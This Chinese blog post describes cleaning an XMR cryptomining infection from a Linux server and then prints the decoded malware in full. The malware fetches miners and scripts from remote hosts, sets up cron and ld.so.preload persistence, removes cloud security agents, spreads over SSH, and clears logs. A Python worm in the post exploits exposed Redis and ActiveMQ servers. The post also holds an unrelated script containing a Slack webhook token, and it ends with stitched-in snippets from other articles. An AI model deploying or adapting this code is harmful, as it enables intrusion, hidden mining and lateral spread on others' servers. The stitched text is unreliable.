挖矿病毒 解决思路 xmr

基本上通过服务器挖矿只能利用cpu的性能了,所以 top查看cpu利用率,但是程序会影藏,让你看不见,解决:删除/usr/local/lib/libntp.so ,后面ssh登录会出现错误提示,解决方法:编辑 .bashrc
检查启动脚本 /etc/cron.d/root 有可能会新建文件夹并影藏,使用ls -a 查看。
检查/tmp路径下文件,删除/tmp/kworkerds
使用top查看pid,kill掉

后面需要注意redis的漏洞,bing 本机ip或者使用的ip ,最好使用其他用户启动redis,我使用的nobody启动。

附上一些代码给有兴趣的朋友研究:
#!/bin/sh

machine=hostname

log_name="/data/logs/nginx/huochaihe.cc.access.log.1"
content=cat "$log_name"|awk ‘{if($9 != 200) print $9"-"$7}‘|sort -rn|uniq -c|awk ‘{if($1 > 10) print $1" "$2}‘|sort -rn

date=date -d yesterday +%Y-%m-%d
prefix=${machine}" "${date}" 非200接口异常信息(超过10次才会展示):\n [次数] [错误码]-[URI]\n"
suffix="\n------------------------------------------------------------------"
content=${prefix}${content}${suffix}

curl -x http://westin.hkv3-h.xduotai.com:11071 \
-X POST -H ‘Content-type: application/json‘ \
--data ‘{"channel":"#production_info", "username": "log_notifications", "text": "‘"$content"‘"}‘ \
https://hooks.slack.com/services/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

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
1002 root 20 0 574m 22m 948 S 50.2 0.1 1719:34 kworkerds
6090 root 20 0 574m 20m 936 S 49.9 0.1 855:02.37 kworkerds
14227 root 20 0 574m 35m 944 S 49.9 0.2 21175:02 kworkerds
3069 root 20 0 574m 21m 936 S 49.6 0.1 1351:32 kworkerds
7170 root 20 0 574m 32m 948 S 49.6 0.2 17488:56 kworkerds
10839 root 20 0 574m 22m 936 S 49.6 0.1 1668:19 kworkerds
11155 root 20 0 574m 22m 936 S 49.6 0.1 1669:09 kworkerds
11958 root 20 0 574m 35m 948 S 49.2 0.2 20526:35 kworkerds

root 1922 1 0 Nov06 ? 00:00:07 crond
root 1936 1 0 Nov06 tty1 00:00:00 /sbin/mingetty /dev/tty1
root 1938 1 0 Nov06 tty2 00:00:00 /sbin/mingetty /dev/tty2
root 1940 1 0 Nov06 tty3 00:00:00 /sbin/mingetty /dev/tty3
root 1942 1 0 Nov06 tty4 00:00:00 /sbin/mingetty /dev/tty4
root 1944 1 0 Nov06 tty5 00:00:00 /sbin/mingetty /dev/tty5
root 1946 728 0 Nov06 ? 00:00:00 /sbin/udevd -d
root 1947 728 0 Nov06 ? 00:00:00 /sbin/udevd -d
root 1948 1 0 Nov06 tty6 00:00:00 /sbin/mingetty /dev/tty6
root 13736 1 2 Nov19 ? 00:27:38 ./redis-server *:6379
root 15045 1 0 Nov06 ? 00:16:53 /usr/sbin/vmtoolsd
root 15100 1 0 Nov06 ? 00:00:00 /usr/lib/vmware-vgauth/VGAuthService -s
root 15715 1682 0 Nov19 ? 00:00:00 sshd: [email protected]/0
root 15717 15715 0 Nov19 pts/0 00:00:00 -bash
~============================================***base64解码后的脚本代码===========================================================
#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

function b() {
pkill -f sourplum
pkill wnTKYg && pkill ddg && rm -rf /tmp/ddg && rm -rf /tmp/wnTKYg
rm -rf /tmp/qW3xT.2 /tmp/ddgs.3013 /tmp/ddgs.3012 /tmp/wnTKYg /tmp/2t3ik
rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
rm -rf /tmp/index_bak
rm -rf /tmp/httpd.conf
rm -rf /tmp/httpd.conf
rm -rf /tmp/a7b104c270
pkill -f biosetjenkins
pkill -f AnXqV.yam
pkill -f xmrigDaemon
pkill -f xmrigMiner
pkill -f xmrig
pkill -f Loopback
pkill -f apaceha
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f performedl
pkill -f JnKihGjn
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f irqbnc1
pkill -f ir29xc1
pkill -f conns
pkill -f irqbalance
pkill -f crypto-pool
pkill -f minexmr
pkill -f XJnRj
pkill -f NXLAi
pkill -f BI5zj
pkill -f askdljlqw
pkill -f minerd
pkill -f minergate
pkill -f Guard.sh
pkill -f ysaydh
pkill -f bonns
pkill -f donns
pkill -f kxjd
pkill -f Duck.sh
pkill -f bonn.sh
pkill -f conn.sh
pkill -f kworker34
pkill -f kw.sh
pkill -f pro.sh
pkill -f polkitd
pkill -f acpid
pkill -f icb5o
pkill -f nopxi
pkill -f irqbalanc1
pkill -f minerd
pkill -f i586
pkill -f gddr
pkill -f mstxmr
pkill -f ddg.2011
pkill -f wnTKYg
pkill -f deamon
pkill -f disk_genius
pkill -f sourplum
pkill -f bashx
pkill -f bashg
pkill -f bashe
pkill -f bashf
pkill -f bashh
pkill -f XbashY
pkill -f libapache
pkill -f qW3xT.2
pkill -f /usr/bin/.sshd
pkill -f sustes
pkill -f Xbash
rm -rf /var/tmp/j
rm -rf /tmp/j
rm -rf /var/tmp/java
rm -rf /tmp/java
rm -rf /var/tmp/java2
rm -rf /tmp/java2
rm -rf /var/tmp/java
rm -rf /tmp/java
rm -rf /tmp/httpd.conf
rm -rf /tmp/conn
rm -rf /tmp/.uninstall /tmp/.python /tmp/.tables /tmp/.mas
rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache
chattr -i /tmp/kworkerds /var/tmp/kworkerds /var/tmp/config.json /tmp/.systemd-private-
rm -rf /tmp/kworkerds /var/tmp/kworkerds /var/tmp/config.json /tmp/.systemd-private-
chattr -i /usr/lib/libiacpkmn.so.3 && rm -rf /usr/lib/libiacpkmn.so.3
chattr -i /etc/init.d/nfstruncate && rm -rf /etc/init.d/nfstruncate
chattr -i /bin/nfstruncate && rm -rf /bin/nfstruncate
rm -rf /etc/rc.d/S01nfstruncate /etc/rc.d/rc.d/S01nfstruncate
chattr -i /bin/ddus-uidgen /etc/init.d/acpidtd /etc/rc.d/rc.d/S01acpidtd /etc/rc.d/S01acpidtd /etc/ld.sc.conf
rm -rf /bin/ddus-uidgen /etc/init.d/acpidtd /etc/rc.d/rc.d/S01acpidtd /etc/rc.d/S01acpidtd /etc/ld.sc.conf
ARCH=$(uname -i)
if [ "$ARCH" == "x86_64" ]; then
(curl -fsSL --connect-timeout 120 https://master.minerxmr.ru/One/n64 -o /bin/netstat||wget https://master.minerxmr.ru/One/n64 -O /bin/netstat) && chmod +x /bin/netstat && touch -acmr /bin/sh /bin/netstat && chattr +i /bin/netstat
elif [ "$ARCH" == "i386" ]; then
(curl -fsSL --connect-timeout 120 https://master.minerxmr.ru/One/n32 -o /bin/netstat||wget https://master.minerxmr.ru/One/n32 -O /bin/netstat) && chmod +x /bin/netstat && touch -acmr /bin/sh /bin/netstat && chattr +i /bin/netstat
else
(curl -fsSL --connect-timeout 120 https://master.minerxmr.ru/One/n32 -o /bin/netstat||wget https://master.minerxmr.ru/One/n32 -O /bin/netstat) && chmod +x /bin/netstat && touch -acmr /bin/sh /bin/netstat && chattr +i /bin/netstat
fi
ps auxf|grep -v grep|grep -v "_" |grep -v "kthreadd" |grep "[.*]"|awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep "xmrig" | awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep "xmrigDaemon" | awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep "xmrigMiner" | awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep "xig" | awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep "ddgs" | awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep "qW3xT" | awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep "t00ls.ru" | awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep "/var/tmp/sustes" | awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep "sustes" | awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep "Xbash" | awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep "hashfish" | awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep "cranbery" | awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep "stratum" | awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep "xmr" | awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep "minerd" | awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep /tmp/thisxxs|awk ‘{print $2}‘|xargs kill
ps auxf|grep -v grep|grep /opt/yilu/work/xig/xig|awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep /opt/yilu/mservice|awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep /usr/bin/.sshd|awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|rep /usr/bin/bsd-port/getty | awk ‘{print $2}‘|xargs kill -9
netstat -anp | grep 69.28.55.86:443 |awk ‘{print $7}‘| awk -F‘[/]‘ ‘{print $1}‘ | xargs kill -9
netstat -anp | grep 185.71.65.238 |awk ‘{print $7}‘| awk -F‘[/]‘ ‘{print $1}‘ | xargs kill -9
netstat -anp | grep 140.82.52.87 |awk ‘{print $7}‘| awk -F‘[/]‘ ‘{print $1}‘ | xargs kill -9
netstat -anp | grep :3333 |awk ‘{print $7}‘| awk -F‘[/]‘ ‘{print $1}‘ | xargs kill -9
netstat -anp | grep :4444 |awk ‘{print $7}‘| awk -F‘[/]‘ ‘{print $1}‘ | xargs kill -9
netstat -anp | grep :5555 |awk ‘{print $7}‘| awk -F‘[/]‘ ‘{print $1}‘ | xargs kill -9
netstat -anp | grep :6666 |awk ‘{print $7}‘| awk -F‘[/]‘ ‘{print $1}‘ | xargs kill -9
netstat -anp | grep :7777 |awk ‘{print $7}‘| awk -F‘[/]‘ ‘{print $1}‘ | xargs kill -9
netstat -anp | grep :3347 |awk ‘{print $7}‘| awk -F‘[/]‘ ‘{print $1}‘ | xargs kill -9
netstat -anp | grep :14444 |awk ‘{print $7}‘| awk -F‘[/]‘ ‘{print $1}‘ | xargs kill -9
netstat -anp | grep :14433 |awk ‘{print $7}‘| awk -F‘[/]‘ ‘{print $1}‘ | xargs kill -9
p=$(ps auxf|grep -v grep|grep kworkerds|wc -l)
if [ ${p} -eq 0 ];then
netstat -anp | grep :56415 |awk ‘{print $7}‘| awk -F‘[/]‘ ‘{print $1}‘ | xargs kill -9
ps auxf|grep -v grep | awk ‘{if($3>=80.0) print $2}‘| xargs kill -9
fi
}

function d() {
ps=$(netstat -an | grep :56415 | wc -l)
if [ ${ps} -eq 0 ];then
(curl -fsSL --connect-timeout 120 https://master.minerxmr.ru/One/1 -o /tmp/kworkerds||wget https://master.minerxmr.ru/One/1 -O /tmp/kworkerds) && chmod +x /tmp/kworkerds
nohup /tmp/kworkerds >/dev/null 2>&1 &
fi
sleep 10
}

function e() {
mkdir -p /var/tmp
chmod 1777 /var/tmp
pm=$(netstat -an | grep :56415 | wc -l)
if [ ${pm} -eq 0 ];then
(curl -fsSL --connect-timeout 120 https://master.minerxmr.ru/One/c -o /var/tmp/config.json||wget https://master.minerxmr.ru/One/c -O /var/tmp/config.json) && chmod +x /var/tmp/config.json
ARCH=$(uname -i)
if [ "$ARCH" == "x86_64" ]; then
(curl -fsSL --connect-timeout 120 https://master.minerxmr.ru/One/x1 -o /var/tmp/kworkerds||wget https://master.minerxmr.ru/One/x1 -O /var/tmp/kworkerds) && chmod +x /var/tmp/kworkerds
elif [ "$ARCH" == "i386" ]; then
(curl -fsSL --connect-timeout 120 https://master.minerxmr.ru/One/x2 -o /var/tmp/kworkerds||wget https://master.minerxmr.ru/One/x2 -O /var/tmp/kworkerds) && chmod +x /var/tmp/kworkerds
else
(curl -fsSL --connect-timeout 120 https://master.minerxmr.ru/One/x1 -o /var/tmp/kworkerds||wget https://master.minerxmr.ru/One/x1 -O /var/tmp/kworkerds) && chmod +x /var/tmp/kworkerds
fi
nohup /var/tmp/kworkerds >/dev/null 2>&1 &
fi
}

function f() {
nohup python -c "import base64;exec(base64.b64decode(‘I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L2hRWlRGQWRDJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz‘))"

#coding: utf-8
import urllib
import base64

d= ‘https://pastebin.com/raw/hQZTFAdC
try:
page=base64.b64decode(urllib.urlopen(d).read())
exec(page)
except:
pass

==================
#! /usr/bin/env python
#coding: utf-8

import threading
import socket
from re import findall
import httplib
import os

IP_LIST = []

class scanner(threading.Thread):
tlist = []
maxthreads = 100
evnt = threading.Event()
lck = threading.Lock()

def __init__(self,host):
    threading.Thread.__init__(self)
    self.host = host
def run(self):
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(2)
        s.connect_ex((self.host, 8161))
        s.send(‘google spider\r\n‘)
        results = s.recv(1)
        if str(results):
            data = "*/10 * * * * root (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh\n##"
            data2 = "*/15 * * * * (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh\n##"
            conn = httplib.HTTPConnection(self.host, port=8161, timeout=2)
            conn.request(method=‘PUT‘, url=‘/fileserver/go.txt‘, body=data)
            conn.request(method=‘PUT‘, url=‘/fileserver/goa.txt‘, body=data2)
            conn.request(method=‘PUT‘, url=‘/fileserver/gob.txt‘, body=data2)
            result = conn.getresponse()
            conn.close()
            if result.status == 204:
                headers = {‘Destination‘: ‘file:///etc/cron.d/root‘}
                headers2 = {‘Destination‘: ‘file:///var/spool/cron/root‘}
                headers3 = {‘Destination‘: ‘file:///var/spool/cron/crontabs/root‘}
                conn = httplib.HTTPConnection(self.host, port=8161, timeout=2)
                conn.request(method=‘MOVE‘, url=‘/fileserver/go.txt‘, headers=headers)
                conn.request(method=‘MOVE‘, url=‘/fileserver/goa.txt‘, headers=headers2)
                conn.request(method=‘MOVE‘, url=‘/fileserver/gob.txt‘, headers=headers3)
                conn.close()
        s.close()
    except Exception:
        pass
    try:
        s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s2.settimeout(2)
        x = s2.connect_ex((self.host, 6379))
        if x == 0:
            s2.send(‘config set stop-writes-on-bgsave-error no\r\n‘)
            s2.send(‘flushall\r\n‘)
            s2.send(‘config set dbfilename root\r\n‘)
            s2.send(‘set SwE3SC "\\t\\n*/10 * * * * root (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh\\n\\t"\r\n‘)
            s2.send(‘set NysX7D "\\t\\n*/15 * * * * (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh\\n\\t"\r\n‘)
            s2.send(‘config set dir /etc/cron.d\r\n‘)
            s2.send(‘save\r\n‘)
            s2.send(‘config set dir /var/spool/cron\r\n‘)
            s2.send(‘save\r\n‘)
            s2.send(‘config set dir /var/spool/cron/crontabs\r\n‘)
            s2.send(‘save\r\n‘)
            s2.send(‘flushall\r\n‘)
            s2.send(‘config set stop-writes-on-bgsave-error yes\r\n‘)
        s2.close()
    except Exception:
        pass
    scanner.lck.acquire()
    scanner.tlist.remove(self)
    if len(scanner.tlist) < scanner.maxthreads:
        scanner.evnt.set()
        scanner.evnt.clear()
    scanner.lck.release()

def newthread(host):
    scanner.lck.acquire()
    sc = scanner(host)
    scanner.tlist.append(sc)
    scanner.lck.release()
    sc.start()

newthread = staticmethod(newthread)

def get_ip_list():
try:
url = ‘ident.me‘
conn = httplib.HTTPConnection(url, port=80, timeout=10)
conn.request(method=‘GET‘, url=‘/‘, )
result = conn.getresponse()
ip1 = result.read()
ips1 = findall(r‘\d+.\d+.‘, ip1)[0]
for u in range(0, 256):
ip_list1 = (ips1 + (str(u)))
for g in range(1, 256):
IP_LIST.append(ip_list1 + ‘.‘ + (str(g)))
except Exception:
ip2 = os.popen("/sbin/ifconfig -a|grep inet|grep -v 127.0.0.1|grep -v inet6|awk ‘{print $2}‘|tr -d \"addr:\"").readline().rstrip()
ips2 = findall(r‘\d+.\d+.‘, ip2)[0]
for i in range(0, 255):
ip_list2 = (ips2 + (str(i)))
for g in range(1, 255):
IP_LIST.append(ip_list2 + ‘.‘ + (str(g)))
pass

def runPortscan():
get_ip_list()
for host in IP_LIST:
scanner.lck.acquire()
if len(scanner.tlist) >= scanner.maxthreads:
scanner.lck.release()
scanner.evnt.wait()
else:
scanner.lck.release()
scanner.newthread(host)
for t in scanner.tlist:
t.join()

if name == "main":
runPortscan()

=======================

/dev/null 2>&1 &
touch /tmp/.38t9guft0055d0565u444gtjr0
}

function c() {
chattr -i /usr/local/bin/dns /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/ld.so.preload
(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/CnPtQ2tM -o /usr/local/bin/dns||wget https://pastebin.com/raw/CnPtQ2tM -O /usr/local/bin/dns) && chmod 755 /usr/local/bin/dns && touch -acmr /bin/sh /usr/local/bin/dns && chattr +i /usr/local/bin/dns
echo -e "SHELL=/bin/sh\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\nMAILTO=root\nHOME=/\n# run-parts\n01 root run-parts /etc/cron.hourly\n02 4 root run-parts /etc/cron.daily\n0 1 root /usr/local/bin/dns" > /etc/crontab && touch -acmr /bin/sh /etc/crontab
echo -e "/10 root (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh\n##" > /etc/cron.d/root && touch -acmr /bin/sh /etc/cron.d/root && chattr +i /etc/cron.d/root
echo -e "/17 root (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh\n##" > /etc/cron.d/apache && touch -acmr /bin/sh /etc/cron.d/apache && chattr +i /etc/cron.d/apache
echo -e "/23 (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh\n##" > /var/spool/cron/root && touch -acmr /bin/sh /var/spool/cron/root && chattr +i /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo -e "/31 (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh\n##" > /var/spool/cron/crontabs/root && touch -acmr /bin/sh /var/spool/cron/crontabs/root && chattr +i /var/spool/cron/crontabs/root
mkdir -p /etc/cron.hourly
(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/1NtRkBc3 -o /etc/cron.hourly/oanacroner||wget https://pastebin.com/raw/1NtRkBc3 -O /etc/cron.hourly/oanacroner) && chmod 755 /etc/cron.hourly/oanacroner
mkdir -p /etc/cron.daily
(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/1NtRkBc3 -o /etc/cron.daily/oanacroner||wget https://pastebin.com/raw/1NtRkBc3 -O /etc/cron.daily/oanacroner) && chmod 755 /etc/cron.daily/oanacroner
mkdir -p /etc/cron.monthly
(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/1NtRkBc3 -o /etc/cron.monthly/oanacroner||wget https://pastebin.com/raw/1NtRkBc3 -O /etc/cron.monthly/oanacroner) && chmod 755 /etc/cron.monthly/oanacroner
mkdir -p /usr/local/lib/
if [ ! -f "/usr/local/lib/libntpd.so" ]; then
ARCH=$(uname -i)
if [ "$ARCH" == "x86_64" ]; then
(curl -fsSL --connect-timeout 120 https://master.minerxmr.ru/One/2 -o /usr/local/lib/libntpd.so||wget https://master.minerxmr.ru/One/2 -O /usr/local/lib/libntpd.so) && chmod 755 /usr/local/lib/libntpd.so && touch -acmr /bin/sh /usr/local/lib/libntpd.so && chattr +i /usr/local/lib/libntpd.so
elif [ "$ARCH" == "i386" ]; then
(curl -fsSL --connect-timeout 120 https://master.minerxmr.ru/One/22 -o /usr/local/lib/libntpd.so||wget https://master.minerxmr.ru/One/22 -O /usr/local/lib/libntpd.so) && chmod 755 /usr/local/lib/libntpd.so && touch -acmr /bin/sh /usr/local/lib/libntpd.so && chattr +i /usr/local/lib/libntpd.so
else
(curl -fsSL --connect-timeout 120 https://master.minerxmr.ru/One/2 -o /usr/local/lib/libntpd.so||wget https://master.minerxmr.ru/One/2 -O /usr/local/lib/libntpd.so) && chmod 755 /usr/local/lib/libntpd.so && touch -acmr /bin/sh /usr/local/lib/libntpd.so && chattr +i /usr/local/lib/libntpd.so
fi
fi
echo /usr/local/lib/libntpd.so > /etc/ld.so.preload && touch -acmr /bin/sh /etc/ld.so.preload && chattr +i /etc/ld.so.preload
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\b([0-9]{1,3}.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h ‘(curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh‘ & done
fi
touch -acmr /bin/sh /etc/cron.hourly/oanacroner
touch -acmr /bin/sh /etc/cron.daily/oanacroner
touch -acmr /bin/sh /etc/cron.monthly/oanacroner
}

function a() {
if ps aux | grep -i ‘[a]liyun‘; then
wget http://update.aegis.aliyun.com/download/uninstall.sh
chmod +x uninstall.sh
./uninstall.sh
wget http://update.aegis.aliyun.com/download/quartz_uninstall.sh
chmod +x quartz_uninstall.sh
./quartz_uninstall.sh
rm -f uninstall.sh quartz_uninstall.sh
pkill aliyun-service
rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
rm -rf /usr/local/aegis*;
elif ps aux | grep -i ‘[y]unjing‘; then
/usr/local/qcloud/stargate/admin/uninstall.sh
/usr/local/qcloud/YunJing/uninst.sh
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi
touch /tmp/.a
}

mkdir -p /tmp
chmod 1777 /tmp
if [ ! -f "/tmp/.a" ]; then
a
fi
b
c
d
port=$(netstat -an | grep :56415 | wc -l)
if [ ${port} -eq 0 ];then
e
fi
if [ ! -f "/tmp/.38t9guft0055d0565u444gtjr0" ]; then
f
fi
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron
#

原文地址:http://blog.51cto.com/njprosound/2322139

时间: 2024-07-28 18:29:28

挖矿病毒 解决思路 xmr的相关文章

服务器被植入挖矿病毒解决办法

服务器被植入挖矿,刚解决完,参考文章! 上午重启服务的时候,发现程序启动死慢,用top命令查看了一下,cpu被占用接近100%,所以无法运行新程序,通过top命令然后输入P,就能看到有两个程序几乎占用了所有的CPU,占用率为700%左右,程序名称为:minerd和AnXqV两个,通过搜索知道是挖矿程序,通过kill命令及pkill命令是无法直接解决的,找到了一个教程,http://www.cnblogs.com/zhouto/p/5680594.html,参考的这个进行的处理,基本上搞定了,不过

阿里云服务器被挖矿病毒minerd入侵的解决方法

早晨上班像往常一样对服务器进行例行巡检,发现一台阿里云服务器的CPU的资源占用很高,到底是怎么回事呢,赶紧用top命令查看了一下,发现是一个名为minerd的进程占用了很高的CPU资源,minerd之前听说过,是一种挖矿病毒,没有想到我负责的服务器会中这种病毒啊,赶紧的寻找解决的方法.下面是我把minerd给杀掉的过程,希望对大家有帮助. 步骤如下: 1.关闭访问挖矿服务器的访问 [[email protected]~]# iptables -A INPUT -s xmr.crypto-pool

解决挖矿病毒占用cpu以及误删 ld-linux-x86-64.so.2 文件的问题

上次已经被抓去挖矿了当了一次旷工了,本以为解决了,没想到竟然死灰复燃. 这次占用cpu的依然是一个ld-linux的进程,kill掉之后同样就查了关于test用户的进程,果然,test用户的进程有100+个,比不上上次,还是用上次的脚本,将test的进程也kill掉.为防止恶意添加用户,将/etc/passwd 文件里的test用户删除后,给该文件添加了隐藏权限 i ,具体功能不知道的可以查下,此处不多介绍.再把主进程ld-linux干掉之后cpu直接降下来. 这已经是第二次了,为了防止还有第三

记一次手动清理Linux挖矿病毒

时间:2018年5月16日 起因:某公司的运维人员在绿盟的IPS上监测到有挖"门罗币"的恶意事件,受影响的机器为公司的大数据服务器以及其他Linux服务器. 我也是赶鸭子上架第一次解决运行在Linux上的挖矿病毒事件,由于当时自己没有专门的Linux挖矿的清理工具,便开始分析IPS上提供的信息. 由于当时的部门对数据的保护比较敏感,并没有对当时操作进行拍照截图,我也只能根据当时我记录的笔记和依稀的记忆来梳理整个事件. IPS提供的信息: 1:受到影响的IP 2:受影响主机连接的地址(1

挖矿病毒DDG的清除

注:以下所有操作均在CentOS 7.2 x86_64位系统下完成. 今天突然收到“阿里云”的告警短信: 尊敬的****:云盾云安全中心检测到您的服务器:*.*.*.*(app)出现了紧急安全事件:挖矿程序,建议您立即登录云安全中心控制台-安全告警查看事件详情,并根据事件建议的方案进行处理. 于是登上“云盾云安全中心”查看,发现安全提示: 点进去查看详细信息: 网上查了下,发现这是一款在Linux/Windows双平台的挖矿病毒木马,该木马是通过Redis漏洞传播的挖矿木马DDG的变种,使用Go

挖矿病毒watchbog处理过程

1 挖矿病毒watchbog处理过程 简要说明 这段时间公司的生产服务器中了病毒watchbog,cpu动不动就是100%,查看cpu使用情况,发现很大一部分都是us,而且占100%左右的都是进程watchbog,怎么办? 前期操作: #top -H top - 23:46:20 up 2:20, 4 users, load average: 17.50, 11.47, 8.05 Threads: 876 total, 18 running, 858 sleeping, 0 stopped, 0

Can&#39;t connect to local MySQL server through socket ‘/var/run/mysqld/mysqld.sock‘ (2)解决思路

首先说明一下mysql.sock文件的作用: 连接mysql有两种方式,第一种是TCP/IP,第二种就是直接使用unix domain socket,它比TCP/IP块. mysql.sock是在mysql-server和client在同一服务器上时,发起本地连接时可用,而无需定义-h参数指定具体的IP.mysql.sock是随每次mysql server启动时生成,通常配置参数是将mysql.sock生成在/tmp/目录下.即在/etc/my.cnf文件中指定socket=/tmp/mysql

防止多图OOM的核心解决思路就是使用LruCache技术

防止多图OOM的核心解决思路就是使用LruCache技术.但LruCache只是管理了内存中图片的存储与释放,如果图片从内存中被移除的话,那么又需要从网络上重新加载一次图片,这显然非常耗时.对此,Google又提供了一套硬盘缓存的解决方案:DiskLruCache(非Google官方编写,但获得官方认证).只可惜,Android Doc中并没有对DiskLruCache的用法给出详细的说明,而网上关于DiskLruCache的资料也少之又少,因此今天我准备专门写一篇博客来详细讲解DiskLruC

一个Android多平台问题兼容解决思路

问题:使用AS打出来的签名包,在调试一直用的5.0的小米手机上可以正常运行,4.4的联想手机上闪退,5.1的模拟器上闪退. 抛出:java.lang.UnsatisfiedLinkError,ClassLoader找不到相关的so库. 解决思路: 猜想跟CPU架构有关系,查询如下(cat /proc/cpuinfo): 模拟器:                     电脑使用的是Intel的cpu                         x86_64架构 联想:Processor